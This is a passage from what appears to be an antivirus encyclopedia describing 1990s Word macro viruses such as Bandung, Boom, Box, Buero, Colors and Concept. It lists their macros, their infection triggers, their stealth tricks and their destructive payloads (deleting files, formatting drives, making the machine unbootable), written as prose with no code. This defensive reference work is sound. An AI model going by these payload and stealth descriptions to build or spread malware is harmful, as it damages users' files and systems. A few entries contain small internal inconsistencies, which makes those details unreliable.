  17692. An exception to this are the files located in the following
  17693. directories:
  17694.  
  17695. C:\WINDOWS
  17696. C:\WINWORD
  17697. C:\WINWORD6
  17698.  
  17699. After the file deletion, Bandung creates the file
  17700. C:\PESAN.TXT.
  17701.  
  17702. The file contains some Indonesian text telling the user
  17703. (translated to English):
  17704.  
  17705. "   You are unlucky, all files on this machine have been deleted,   "
  17706. "   except for WINDOWS and WINWORD, don't panic, this is  "
  17707. "   not your fault, but this the result of my work......Whoever  "
  17708. "   is able to find a way to combat this virus, I will give the   "
  17709. "   virus listing to you!!!! And of course I will constantly  "
  17710. "   return to greet you with my new viruses .....good luck !  "
  17711. "   Bandung Monday, June 28 1996, 13:00 pm   "
  17712.  
  17713. Another payload replaces the letter "a" with "#@." This occurs
  17714. when the "ToolsCustomize" macro is called.
  17715.  
  17716. Bandung also displays some WordBasic error messages.
  17717.  
  17718.  
  17719. [Word_Bandung.B]
  17720. Virus name: Word.Bandung.B
  17721. Virus Type: Word macro virus
  17722. Number of macros: 6
  17723. Encrypted: No
  17724. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs
  17725.              Toolsmacro, Toolscustomize
  17726. Size of macros: 4262 Bytes
  17727. Place of origin: Bandung, Indonesia
  17728. Date of origin: August/September 1996
  17729. Destructive: No
  17730. Seen In-The-Wild: No
  17731. Description:
  17732.  
  17733. The difference between this new variant and the original
  17734. Bandung.A virus is that the AutoExec, ToolsMacro and
  17735. ToolsCustomize macros are corrupted.
  17736.  
  17737. Due to the corruption, Bandung.B does not activate its
  17738. destructive payload. Instead of the payload activation, it
  17739. displays various error messages.  Bandung.B is still able to
  17740. infect the global template and further documents.
  17741.  
  17742. Bandung uses "Toolsmacro" to make recognition of an
  17743. infected file more difficult (called macro stealth technique).
  17744.  
  17745.  
  17746. [Word_Bandung.C]
  17747. Virus name: Word.Bandung.C
  17748. Virus Type: Word macro virus
  17749. Number of macros: 6
  17750. Encrypted: No
  17751. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17752.              Toolsmacro, Toolscustomize
  17753. Size of macros: 5428 Bytes
  17754. Place of origin: Bandung, Indonesia
  17755. Date of origin: December 1996
  17756. Payload: Yes
  17757. Common In-The-Wild: No
  17758. Description:
  17759.  
  17760. The difference between this new variant and the original
  17761. Bandung.A virus is that the "AutoExec" macro was replaced
  17762. with the corrupted "AutoOpen" macro from the Rapi virus.
  17763.  
  17764. The payload replaces the letter "a" with "#@." This occurs
  17765. when the "ToolsCustomize" macro is called.
  17766.  
  17767. Bandung.C uses "ToolsMacro" to make recognition of an
  17768. infected document more difficult (called macro stealth
  17769. technique).
  17770.  
  17771. Due to the new macro code, Bandung.C displays a syntax
  17772. error message whenever Microsoft Word is started.
  17773.  
  17774.  
  17775.  
  17776. [Word_Bandung.D]
  17777. Virus name: Word.Bandung.D
  17778. Virus Type: Word macro virus
  17779. Number of macros: 6
  17780. Encrypted: No
  17781. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17782.              Toolsmacro, Toolscustomize
  17783. Size of macros: 4262 Bytes
  17784. Place of origin: Bandung, Indonesia
  17785. Date of origin: December 1996
  17786. Destructive: Yes
  17787. Common In-The-Wild: No
  17788. Description:
  17789.  
  17790. The difference between this new variant and the original
  17791. Bandung.A virus is that the "AutoExec" macro is corrupted.
  17792. Even though there is a corruption in the "AutoExec" macro,
  17793. Bandung.D still activates its destructive payload when
  17794. Microsoft Word is started.
  17795.  
  17796. Another payload replaces the letter "a" with "#@." This occurs
  17797. when the "ToolsCustomize" macro is called.
  17798.  
  17799. Bandung.D uses macro stealth technique to hide itself. It uses
  17800. "ToolsMacro" to make recognition of an infected document
  17801. more difficult (called macro stealth technique).
  17802.  
  17803. Due to its macro corruption, Bandung.D displays some error
  17804. messages.
  17805.  
  17806. For more information, please refer to the Bandung.A virus description.
  17807.  
  17808.  
  17809.  
  17810. [Word_Bandung.E]
  17811. Virus name: Word.Bandung.E
  17812. Virus Type: Word macro virus
  17813. Number of macros: 6
  17814. Encrypted: No
  17815. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17816.              Toolsmacro, Toolscustomize
  17817. Size of macros: 4262 Bytes
  17818. Place of origin: Bandung, Indonesia
  17819. Date of origin: January 1997
  17820. Payload: Yes
  17821. Common In-The-Wild: No
  17822. Description:
  17823.  
  17824. The difference between this new variant and the original
  17825. Bandung.A virus is that the "AutoExec" macro is corrupted.
  17826.  
  17827. The payload replaces the letter "a" with "#@." This occurs
  17828. when the "ToolsCustomize" macro is called.
  17829.  
  17830. Bandung.E uses "ToolsMacro" to make recognition of an
  17831. infected document more difficult (called macro stealth technique).
  17832.  
  17833. Due to its macro corruption, Bandung.E never executes its
  17834. destructive payload. Instead it displays the following
  17835. Wordbasic error message:
  17836.  
  17837. "   Out of Memory   "
  17838.  
  17839.  
  17840. [Word_Bandung.G]
  17841. Virus name: Word.Bandung.G
  17842. Virus Type: Word macro virus
  17843. Number of macros: 6
  17844. Encrypted: No
  17845. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17846.              ToolsMacro, ToolsCustomize
  17847. Size of macros: 1990 Bytes
  17848. Place of origin: Bandung, Indonesia
  17849. Date of origin: January 1997
  17850. Payload: Yes
  17851. Seen In-The-Wild: No
  17852. Description:
  17853.  
  17854. The only difference between this new variant and the original
  17855. Bandung.A virus is the "AutoExec" macro.
  17856. Bandung.G contains only two lines. One line is empty and one
  17857. contains a "DisableAutoMacros" statement.
  17858.  
  17859. The payload replaces the letter "a" with "#@." This occurs
  17860. when the "ToolsCustomize" macro is called.
  17861.  
  17862. Bandung.G does not have the destructive payload from the
  17863. original Bandung.A virus.
  17864.  
  17865.  
  17866.  
  17867. [Word_Bandung.I]
  17868. Virus name: Word.Bandung.I
  17869. Virus Type: Word macro virus
  17870. Number of macros: 6
  17871. Encrypted: No
  17872. Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
  17873.              ToolsMacro, ToolsCustomize
  17874. Size of macros: 1988 Bytes
  17875. Place of origin: Bandung, Indonesia
  17876. Date of origin: February 1997
  17877. Destructive: No
  17878. Seen In-The-Wild: No
  17879. Description:
  17880.  
  17881. The only difference between this new variant and the original
  17882. Bandung.A virus is the "AutoExec" macro.
  17883. Bandung.I contains only three lines from an anti-virus
  17884. solution, which disables all the automacros.
  17885.  
  17886. Bandung.I does not have the destructive payload from the
  17887. original Bandung.A virus.
  17888.  
  17889. For more information, please refer to the Bandung.A virus.
  17890.  
  17891.  
  17892.  
  17893. [Word_Bertik.A]
  17894. Virus name: Word.Bertik.A
  17895. Virus Type: Word macro virus
  17896. Number of macros: 5
  17897. Encrypted: Yes
  17898. Macro names: XXXAO, XXXFS, XXXFSA, Payload, AutoOpen
  17899.              (YYYAO, FileSave, FileSaveAs)
  17900. Size of macros: 2988 Bytes
  17901. Place of origin: Unknown
  17902. Date of origin: Spring 1997
  17903. Payload: Yes
  17904. Seen In-The-Wild: Yes
  17905. Description:
  17906.  
  17907. Bertik.A infects the global template (normal.dot) when an
  17908. infected document is opened. Further documents become
  17909. infected when they are also opened (AutoOpen) or saved
  17910. (FileSave and FileSaveAs).
  17911.  
  17912. Bertik is not destructive, it only copies the WINWORD.HLP file
  17913. to the templates directory. This happens whenever Bertik infects
  17914. a new document. During the process of copying,
  17915. WINWORD.HLP is renamed to number.WRD, where "number" increments
  17916. with each infection.
  17917.  
  17918. Due to the size of WINWORD.HLP, Bertik can fill up the hard drive
  17919. space.  After a Bertik infection, the templates directory should
  17920. be checked for "*.WRD" files.
  17921.  
  17922. Bertik also displays the following message when reaching a full
  17923. hard drive:
  17924.  
  17925. "   !!!Made by virus Bertik 1 !!!   "
  17926.  
  17927.  
  17928. [Word_Birthday.A:De (a.k.a. PCW)]
  17929. Virus name: Word.Birthday.A:De (a.k.a. PCW)
  17930. Virus Type: Word macro virus
  17931. Number of macros: 2
  17932. Encrypted: Yes
  17933. Macro names: AutoOpen, DateiSpeichernUnter
  17934. Size of macros: 1039 Bytes
  17935. Place of origin: German computer magazine
  17936. Date of origin: July 1996
  17937. Destructive: No
  17938. Common In-The-Wild: No
  17939. Description:
  17940.  
  17941. Birthday infects the global template (normal.dot) when an
  17942. infected document is opened. Further documents become
  17943. infected when the "DateiSpeichernUnter" command is used.
  17944.  
  17945. It displays the following message:
  17946.  
  17947. "   Happy Birthday! Herzlichen Glⁿckwunsch...  "
  17948.  
  17949.  
  17950. [Word_Boom.A:De (a.k.a. Boombastic)]
  17951. Virus name: Word.Boom.A:De (a.k.a. Boombastic)
  17952. Virus Type: Word macro virus
  17953. Number of macros: 4
  17954. Encrypted: Yes
  17955. Macro names: AutoExec, AutoOpen, DateiSpeichernUnter,
  17956.              System
  17957. Size of macros: 2863 Bytes
  17958. Place of origin: Germany
  17959. Date of origin: July 1996
  17960. Payload: Yes
  17961. Common In-The-Wild: Yes
  17962. Description:
  17963.  
  17964. Boom is the second macro virus written for the German
  17965. version of Microsoft Word.
  17966.  
  17967. Boom's destructive payload renames the menu structure of
  17968. Word to:
  17969.  
  17970. Datei       ->    Mr.Boombastic
  17971. Bearbeiten  ->    and
  17972. Ansicht     ->    Sir WIXALOT
  17973. Einfuegen   ->    are
  17974. Format      ->    watching
  17975. Extras      ->    you
  17976. Tabelle     ->    !
  17977. Fenster     ->    !
  17978. Hilfe       ->    !
  17979.  
  17980. A sound is send to the PC speaker during the renaming
  17981. process. After the menu change, Boom will create a new
  17982. global template and insert the following text:
  17983.  
  17984. "   Greetings from Mr. Boombastic and Sir WIXALOT !!!   "
  17985.  
  17986. "   Oskar L., wir kriegen dich!!!   "
  17987.  
  17988. "Dies ist eine Initiative des Institutes zur Vermeidung und
  17989. Verbreitung von "
  17990.  
  17991. "  Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen,
  17992. unter der   "
  17993.  
  17994. "               Schirmherrschaft von Rudi S. !                  "
  17995.  
  17996. Boom prints this text.
  17997.  
  17998. [Word_Box.B]
  17999. Virus name: Word.Box.B
  18000. Virus Type: Word macro virus
  18001. Number of macros: 7
  18002. Encrypted: Yes
  18003. Macro names: Box, Dead, AutoOpen, AutoClose, FilePrint,
  18004.              FilePrintDefault, ToolsMacro
  18005. Size of macros: 1988 Bytes
  18006. Place of origin: Taiwan
  18007. Date of origin: February 1997
  18008. Destructive: Yes
  18009. Seen In-The-Wild: No
  18010. Description:
  18011.  
  18012. Box.B infects the global template and further documents when
  18013. an infected document is opened (AutoOpen) or closed
  18014. (AutoClose).
  18015.  
  18016. Box.B uses "ToolsMacro" to make recognition of an infected
  18017. file more difficult (called macro stealth technique).
  18018.  
  18019. Box.B consists of several destructive payloads. One payload
  18020. formats the C:\ drive, another one drops the Dos-based virus
  18021. "One Half.3544".
  18022.  
  18023. A third payload displays the following messages and adds it to
  18024. printed documents:
  18025.  
  18026. "   Taiwan Super No. 1 Macro Virus   "
  18027. "   Twno1-S   "
  18028. "   Today is my Birthday   "
  18029.  
  18030. Box.B only works with the Chinese version of Microsoft Word.
  18031.  
  18032.  
  18033.  
  18034. [Word_Buero.A (a.k.a Bureau, BuroNeu)]
  18035. Virus name: Word.Buero.A (a.k.a Bureau, BuroNeu)
  18036. Virus Type: Word macro virus
  18037. Number of macros: 2
  18038. Encrypted: Yes
  18039. Macro names: AutoOpen (DateiSpeichern), BueroNeu
  18040. Size of macros: 697 Bytes
  18041. Place of origin: Germany
  18042. Date of origin: August 1996
  18043. Destructive: Yes
  18044. Common In-The-Wild: Yes
  18045. Description:
  18046.  
  18047. Buero is another macro virus written for the German version
  18048. of Microsoft Word.
  18049.  
  18050. Buero infects the global template (Normal.dot) when an
  18051. infected document is opened. Further documents become
  18052. infected with the "DateiSpeichern" (only in the global template)
  18053. command.
  18054.  
  18055. After August 15, 1996, Buero renames the system file
  18056. "IO.SYS" to "IIO.SYS." This action will leave the computer
  18057. unbootable.  The second destructive payload searches for
  18058. C:\*.DOC files and deletes them.
  18059.  
  18060.  
  18061. [Word_Cap.a]
  18062. Virus name: Word.Cap.a
  18063. Virus Type: Word macro virus
  18064. Number of macros: differs
  18065. Encrypted: Yes
  18066. Macro names: CAP
  18067. Size of macros: differs
  18068. Place of origin: Unknown
  18069. Date of origin: December 1996
  18070. Destructive: No
  18071. Common In-The-Wild: Yes
  18072. Description:
  18073.  
  18074. Cap.A is another complex macro virus that is able to spread
  18075. on various localized versions of Microsoft Word. While some
  18076. macros keep the same name, others are automatically assigned
  18077. new names from the localized version of Word.
  18078.  
  18079. When Cap.A infects the global template, it deletes all existing
  18080. macros. It infects the global template when an infected
  18081. document is opened.
  18082.  
  18083. Cap.A uses "ToolsMacro" and "FileTemplates" to make
  18084. recognition of an infected document more difficult (called
  18085. macro stealth technique).
  18086.  
  18087.  
  18088. [Word_Cebu.A]
  18089. Virus name: Word.Cebu.A
  18090. Virus Type: Word macro virus
  18091. Number of macros: 4 or more
  18092. Encrypted: Yes
  18093. Macro names: AutoOpen, AutoClose, AutoExec, MSRun
  18094. Size of macros: 1237 Bytes
  18095. Place of origin: Hong Kong
  18096. Date of origin: Spring 1997
  18097. Destructive: Yes
  18098. Seen In-The-Wild: No
  18099. Description:
  18100.  
  18101. Cebu infects the global template when an infected document is
  18102. opened. Further documents become infected when they are also
  18103. opened (AutoOpen) or closed (AutoClose).
  18104.  
  18105. When Cebu triggers (probability of 59/60), it replaces the word
  18106. " Asian " with the Word " Cebu ". This happens when Microsoft
  18107. Word is started (AutoExec) and sixty-four minutes later
  18108. (new probability: 2/15).
  18109.  
  18110. Cebu is one of the very few macro viruses that copies user macros,
  18111. therefore it can exist with 4 or more macros.
  18112. We recommend that you de-install the macro anti-virus solutions
  18113. (such as Scanprot) in order to prevent Cebu from snatching
  18114. macros.
  18115.  
  18116.  
  18117. [Word_Cebu.B]
  18118. Virus name: Word.Cebu.B
  18119. Virus Type: Word macro virus
  18120. Number of macros: 4 or more
  18121. Encrypted: Yes
  18122. Macro names: AutoOpen, AutoClose, AutoExec, MSRun
  18123. Size of macros: 1976 Bytes
  18124. Place of origin: Unknown
  18125. Date of origin: May 1997
  18126. Destructive: Yes
  18127. Seen In-The-Wild: No
  18128. Description:
  18129.  
  18130. Cebu.B infects the global template when an infected document
  18131. is opened. Further documents become infected when they are
  18132. also opened (AutoOpen) or closed (AutoClose).
  18133.  
  18134. The main difference between this new variant and the previous
  18135. Cebu.A virus is that Cebu.B has some modified codes and also
  18136. contains various bugs.
  18137.  
  18138. For more information, please refer to the Cebu.A virus description.
  18139.  
  18140.  
  18141. [Word_Chaos.A]
  18142. Virus name: Word.Chaos.A
  18143. Virus Type: Word macro virus
  18144. Number of macros: 4
  18145. Encrypted: Yes
  18146. Macro names: FileOpen (TempFileOpen), FileSave (TempFileSave),
  18147.              AutoExec (TempAutoExec), TempAutoOpen (AutoOpen)
  18148. Size of macros: 2810
  18149. Place of origin: Unknown
  18150. Date of origin: June, 1996
  18151. Destructive: Yes
  18152. Seen In-The-Wild: No
  18153. Description:
  18154.  
  18155. Chaos infects the global template when an infected file is
  18156. opened.  Further documents become infected when they
  18157. opened (FileOpen) or saved (FileSave).
  18158.  
  18159. Upon starting Word (AutoExec), Chaos puts the following text
  18160. string on the status bar: (users will recognize a delay)
  18161.  
  18162. "   number/500   "
  18163.  
  18164. When the random number on the left side reaches 500, Chaos tries
  18165. to halt the computer.
  18166.  
  18167.  
  18168. [Word_Clock.A:De (a.k.a Extra)]
  18169. Virus name: Word.Clock.A:De (a.k.a Extra)
  18170. Virus Type: Word macro virus
  18171. Number of macros: 11
  18172. Encrypted: Yes
  18173. Macro names: Action, AutoExec, AutoOpen, Extrasmakro,
  18174.              DateiSchliessen, Datumunduhrzeit, DateiDokVorlagen,
  18175.              Dateiallesspeichern, Oeffnen, Speichern
  18176. Size of macros: 3795 Bytes
  18177. Place of origin: USA
  18178. Date of origin: Summer 1996
  18179. Payload: Yes
  18180. Common In-The-Wild: No
  18181. Description:
  18182.  
  18183. Clock is another macro virus written for the German version of
  18184. Microsoft Word.
  18185.  
  18186. It uses "ExtrasMakro" and "DateiDokVorlagen" to make
  18187. recognition of an infected document more difficult (called
  18188. macro stealth technique).
  18189.  
  18190. When an infected document is opened after the 26th of each
  18191. month, Clock will display a window containing the time. It will
  18192. also activate one of its payloads, which sets the system clock
  18193. to a value of 33 in the seconds field. Clock does this every 2 to
  18194. 3 minutes, which results to a less accurate system clock.
  18195.  
  18196. The second payload will start in 1997. Clock will check the
  18197. system clock, and in case of a minute value smaller than 5, it
  18198. will flip the "FileOpen" and "FileSave" macros.
  18199.  
  18200. This will only happen on:
  18201.  
  18202. 1st of each month
  18203. 2nd of each month
  18204. 13th of each month
  18205. 21st of each month
  18206. 27th of each month
  18207.  
  18208. [Word_Colors.A (a.k.a Rainbow)]
  18209. Virus name: Word.Colors.A (a.k.a Rainbow)
  18210. Virus Type: Word macro virus
  18211. Number of macros: 9
  18212. Encrypted: Yes
  18213. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18214.              FileSave, FileSaveAs, macros, ToolsMacro
  18215. Size of macros: 6470 Bytes
  18216. Place of origin: Portugal
  18217. Date of origin: Posted to Usenet in October 1995
  18218. Payload: Yes
  18219. Common In-The-Wild: Yes
  18220. Description:
  18221.  
  18222. Colors is the first macro virus that can still infect, even
  18223. when all the Auto-macros are turned off. It also uses
  18224. "ToolsMacro" to make recognition of an infected file more
  18225. difficult (called macro stealth technique).
  18226.  
  18227. Upon activation of one of its macros (all except for AutoExec),
  18228. Colors tries to infect the global template (normal.dot).
  18229. It checks if all its macros are already present in the global
  18230. template and if this is not the case, it transfers the virus macros
  18231. or replaces already existing ones.
  18232.  
  18233. The global template becomes infected when a document is
  18234. opened, saved, closed or Microsoft Word is exited. Further
  18235. documents become infected when a file is created (FileNew) or
  18236. saved (FileSave, FileSaveAs).
  18237.  
  18238. The destructive payload is located in the "macros" macro.
  18239. Once activated Colors creates a variable in the [Windows]
  18240. section of Win.ini with the name "countersu," which counts
  18241. upwards from zero. After each 300th call, Colors changes the
  18242. color palette of 21 Windows desktop elements.
  18243. Background, buttons and borders will have new randomly
  18244. selected colors, which will leave the user with a sometimes
  18245. unusual looking desktop.
  18246.  
  18247.  
  18248. [Word_Colors.B (a.k.a Colo-b)]
  18249. Virus name: Word.Colors.B (a.k.a Colo-b)
  18250. Virus Type: Word macro virus
  18251. Number of macros: 9
  18252. Encrypted: Yes
  18253. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18254.              FileSave, FileSaveAs, macros, ToolsMacro
  18255. Size of macros: 7006 Bytes
  18256. Place of origin: Portugal
  18257. Date of origin: April 1996
  18258. Payload: Yes
  18259. Common In-The-Wild: No
  18260. Description:
  18261.  
  18262. Colors.B seems to be a variant of the previously found Colors.A
  18263. virus.  All of the macros seem to be identical to Colors.A,
  18264. except for the "AutoOpen" macro, which seems to come from
  18265. the Concept virus. It looks like a Colors infected document
  18266. was re-infected with Concept, which replaced the "AutoOpen"
  18267. macro with its own.
  18268.  
  18269. Colors.B is still able to replicate, even though it has new virus
  18270. code from a different virus. Colors.B is the first virus that
  18271. combines virus codes from 2 different viruses (Colors.A and
  18272. Concept.A).
  18273.  
  18274.  
  18275. [Word_Colors.C (a.k.a Colo-c)]
  18276. Virus name: Word.Colors.C (a.k.a Colo-c)
  18277. Virus Type: Word macro virus
  18278. Number of macros: 9
  18279. Encrypted: Yes
  18280. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18281.              FileSave, FileSaveAs, macros, ToolsMacro
  18282. Size of macros: 6493 Bytes
  18283. Place of origin: Unknown
  18284. Date of origin: July 1996
  18285. Payload: Yes
  18286. Common In-The-Wild: No
  18287. Description:
  18288.  
  18289. Colors.C seems to be a corrupted variant of the previously found
  18290. Colors.A virus. The submitted virus sample infected the global
  18291. template (normal.dot) and new documents, yet the new
  18292. infected documents were unable to infect further documents.
  18293. Only the first generation was able to infect other files.
  18294.  
  18295. Colors.C is therefore very unlikely to survive.
  18296.  
  18297.  
  18298. [Word_Colors.D (a.k.a Colo-d)]
  18299. Virus name: Word.Colors.D (a.k.a Colo-d)
  18300. Virus Type: Word macro virus
  18301. Number of macros: 9
  18302. Encrypted: Yes
  18303. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18304.              FileSave, FileSaveAs, macros, ToolsMacro
  18305. Size of macros: 19688 Bytes
  18306. Place of origin: Unknown
  18307. Date of origin: August 1996
  18308. Payload: Yes
  18309. Common In-The-Wild: No
  18310. Description:
  18311.  
  18312. Colors.D seems to be a combination of the previously found
  18313. Colors.A virus and the Microsoft macro virus solution "Scanprot".
  18314.  
  18315. Even though Colors.D has an anti-virus solution in its
  18316. code, it is still able to spread and infect the global template
  18317. (normal.dot) and further documents.
  18318.  
  18319.  
  18320. [Word_Colors.E]
  18321. Virus name: Word.Colors.E
  18322. Virus Type: Word macro virus
  18323. Number of macros: 9
  18324. Encrypted: Yes
  18325. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18326.              FileSave, FileSaveAs, Macros, ToolsMacro
  18327. Size of macros: 6290 Bytes
  18328. Place of origin: Unknown
  18329. Date of origin: Fall 1996
  18330. Destructive: No
  18331. Seen In-The-Wild: No
  18332. Description:
  18333.  
  18334. The only difference between this new variant and the original
  18335. Colors.A virus is that the "AutoOpen" macro has been replaced
  18336. with a harmless one. This has no effect on the virus. Colors.E is
  18337. still able to activate and infect further documents.
  18338.  
  18339.  
  18340. [Word_Colors.F]
  18341. Virus name: Word.Colors.F
  18342. Virus Type: Word macro virus
  18343. Number of macros: 9
  18344. Encrypted: Yes
  18345. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18346.              FileSave, FileSaveAs, Macros, ToolsMacro
  18347. Size of macros: 6402 Bytes
  18348. Place of origin: Unknown
  18349. Date of origin: Fall 1996
  18350. Destructive: No
  18351. Seen In-The-Wild: No
  18352. Description:
  18353.  
  18354. The only difference between this new variant and the original
  18355. Colors.A virus is that the "AutoOpen" macro has been replaced
  18356. with a new one. This has no effect on the virus. Colors.F is
  18357. still able to activate and infect further documents.
  18358.  
  18359.  
  18360. [Word_Colors.G]
  18361. Virus name: Word.Colors.G
  18362. Virus Type: Word macro virus
  18363. Number of macros: 9
  18364. Encrypted: Yes
  18365. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew
  18366.              FileSave, FileSaveAs, Macros, ToolsMacro
  18367. Size of macros: 7006 Bytes
  18368. Place of origin: Unknown
  18369. Date of origin: January 1997
  18370. Destructive: No
  18371. Seen In-The-Wild: No
  18372. Description:
  18373.  
  18374. Colors.G is a minor variant of the older Colors.B virus.
  18375.  
  18376. The only difference between this new variant and Colors.B is
  18377. that the "AutoOpen" macro has been replaced with an encrypted
  18378. Concept macro. In addition, the "ToolsMacro" macro from
  18379. Colors.B is corrupted. Due to the virus code change, Colors.B
  18380. does not activate when an infected document is opened.
  18381.  
  18382. Colors.F uses "ToolsMacro" to make recognition of an infected
  18383. document more difficult (called macro stealth technique).
  18384.  
  18385. For more information, please refer to the Colors.A virus description.
  18386.  
  18387.  
  18388. [Word_Colors.H]
  18389. Virus name: Word.Colors.H
  18390. Virus Type: Word macro virus
  18391. Number of macros: 9
  18392. Encrypted: Yes
  18393. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
  18394.              FileSave, FileSaveAs, Macros, ToolsMacro
  18395. Size of macros: 9984 Bytes
  18396. Place of origin: Unknown
  18397. Date of origin: January 1997
  18398. Destructive: No
  18399. Seen In-The-Wild: No
  18400. Description:
  18401.  
  18402. Colors.H is a minor variant based on the older Colors.A virus
  18403. and the anti-virus macro solution "WWFix" from Datafellows.
  18404. Even though Colors.H has an anti-virus solution in its code, it
  18405. is still able to spread and infect further documents.
  18406.  
  18407. When an infected document is opened, the new AutoOpen
  18408. macro searches the system for the Concept virus. After the
  18409. scan it tries to install the protective macros, which are not
  18410. present.  As a result Colors.H displays the following error
  18411. message:
  18412.  
  18413. "   Document is not open   "
  18414.  
  18415. Colors.H uses "ToolsMacro" to make recognition of an infected
  18416. document more difficult (called macro stealth technique).
  18417.  
  18418. For more information, please refer to the Colors.A virus description.
  18419.  
  18420.  
  18421. [Word_Colors.I]
  18422. Virus name: Word.Colors.I
  18423. Virus Type: Word macro virus
  18424. Number of macros: 8
  18425. Encrypted: Yes
  18426. Macro names: AutoExec, AutoOpen, AutoClose, FileExit, FileSave,
  18427.              FileSaveAs, ToolsMacro, Macros
  18428. Size of macros: 6117 Bytes
  18429. Place of origin: Unknown
  18430. Date of origin: 1997
  18431. Destructive: No
  18432. Common In-The-Wild: No
  18433. Description:
  18434.  
  18435. Colors.I is a new variant based on the original Colors.A virus.
  18436. The main difference is the "AutoOpen" macro which was
  18437. probably snatched from another virus.
  18438. This new macro copies the "AutoOpen", "AutoClose" and
  18439. "FileSaveAs" macro to the global template instead of calling
  18440. the routines in the "macros" macro.
  18441. In addition, Colors.I does not have any "FileNew" macro.
  18442.  
  18443. Colors.I infects when an infected document is closed
  18444. (AutoClose), saved (FileSave and FileSaveAs) and when the
  18445. ToolsMacro command is used.
  18446.  
  18447. Colors.I uses "ToolsMacro" to make recognition of an infected
  18448. file more difficult (called macro stealth technique).
  18449.  
  18450. For more information, please refer to the Colors.A virus description.
  18451.  
  18452.  
  18453. [Word_Color.J]
  18454. Virus name: Word.Colors.J
  18455. Virus Type: Word macro virus
  18456. Number of macros: 9
  18457. Encrypted: Yes
  18458. Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew
  18459.              FileSave, FileSaveAs, Macros, ToolsMacro
  18460. Size of macros: 6983 Bytes
  18461. Place of origin: Unknown
  18462. Date of origin: February 1997
  18463. Destructive: No
  18464. Seen In-The-Wild: No
  18465. Description:
  18466.  
  18467. Colors.J is a minor variant based on the older Colors.B virus.
  18468. The only difference between the two viruses is one line of
  18469. unimportant code.
  18470.  
  18471. Colors.J uses "ToolsMacro" to make recognition of an infected
  18472. document more difficult (called macro stealth technique).
  18473.  
  18474. For more information, please refer to the Colors.B virus description.
  18475.  
  18476.  
  18477. [Word_Colors.K]
  18478. Virus name: Word.Colors.K
  18479. Virus Type: Word macro virus
  18480. Number of macros: 9
  18481. Encrypted: Yes
  18482. Macro names: Macros, FileNew, AutoExec, AutoOpen, FileExit,
  18483.              FileSave, AutoClose, FileSaveAs, ToolsMacro
  18484. Size of macros: 6288 Bytes
  18485. Place of origin: Unknown
  18486. Date of origin: February 1997
  18487. Destructive: No
  18488. Common In-The-Wild: No
  18489. Description:
  18490.  
  18491. Colors.K is a new variant based on the original Colors.A virus.
  18492. The only difference between the two viruses is that the
  18493. "AutoOpen" macro, with only 3 lines, has been snatched from
  18494. another document.
  18495.  
  18496. For more information, please refer to the Colors.A virus description.
  18497.  
  18498.  
  18499. [Word_Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)]
  18500. Virus name: Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)
  18501. Virus Type: Word macro virus
  18502. Number of macros: 4
  18503. Encrypted: No
  18504. Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
  18505. Size of macros: 1968 Bytes
  18506. Place of origin: USA
  18507. Date of origin: July 1995
  18508. Destructive:  No
  18509. Common In-The-Wild: Yes
  18510. Description:
  18511.  
  18512. Concept was the first macro virus found "In-the-Wild." It was
  18513. discovered in July-August 1995 and is now the most common
  18514. virus.
  18515.  
  18516. Concept activates when an infected document is opened
  18517. (AutoOpen).  Upon activation, Concept checks for a previous
  18518. infection of the global template (normal.dot). If none of the
  18519. macros are present, Concept copies its virus macros.
  18520. The "AAAZFS" macro is saved under the name "FileSaveAs."
  18521.  
  18522. After infecting the global template, Concept makes an entry in
  18523. the Win.ini file. It sets "WW6I=1" and displays a window with
  18524. a "1" in it.
  18525.  
  18526. Concept does not contain any destructive payload, even
  18527. though is has a macro with the name "Payload." The "Payload"
  18528. macro is empty except for the following text:
  18529.  
  18530. "   That's enough to prove my point   "
  18531.  
  18532.  
  18533. [Word_Concept.B]
  18534. Virus name: Word.Concept.B
  18535. Virus Type: Word macro virus
  18536. Number of macros: 4
  18537. Encrypted: No
  18538. Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload
  18539. Size of macros: 2016 Bytes
  18540. Place of origin: France
  18541. Date of origin: Spring 1996
  18542. Destructive: No
  18543. Common In-The-Wild: Yes
  18544. Description:
  18545.  
  18546. The only difference between Concept.A and Concept.B is that
  18547. the virus author translated the "FileSaveAs" macro into its
  18548. French equivalent.  Therefore this new variant only works with
  18549. the French version of Microsoft Word.
  18550.  
  18551.  
  18552.  
  18553. [Word_Concept.C]
  18554. Virus name: Word.Concept.C
  18555. Virus Type: Word macro virus
  18556. Number of macros: 4
  18557. Encrypted: No
  18558. Macro names: AutoOpen, F1, F2, Boom, FileSaveAs
  18559. Size of macros: 1834 Bytes in .doc files
  18560.                 1559 Bytes in .dot files
  18561. Place of origin: Unknown
  18562. Date of origin: Summer 1996
  18563. Destructive: No
  18564. Common In-The-Wild: No
  18565. Description:
  18566.  
  18567. The difference between this new variant and the original
  18568. Concept virus can be found in the macro names and the
  18569. contents of the "Boom" macro.  Concept.C activates when an
  18570. infected document is opened (AutoOpen).
  18571. Further documents become infected when they are saved with
  18572. the "FileSaveAs" command.
  18573.  
  18574. Concept.C displays a message box with a " 1 " in it.
  18575.  
  18576. The "Boom" macro contains another message, yet not
  18577. displayed:
  18578.  
  18579. "   Fight racism; Smash Fascizm   "
  18580.  
  18581.  
  18582.  
  18583. [Word_Concept.D]
  18584. Virus name: Word.Concept.D (a.k.a. Haha)
  18585. Virus Type: Word macro virus
  18586. Number of macros: 4
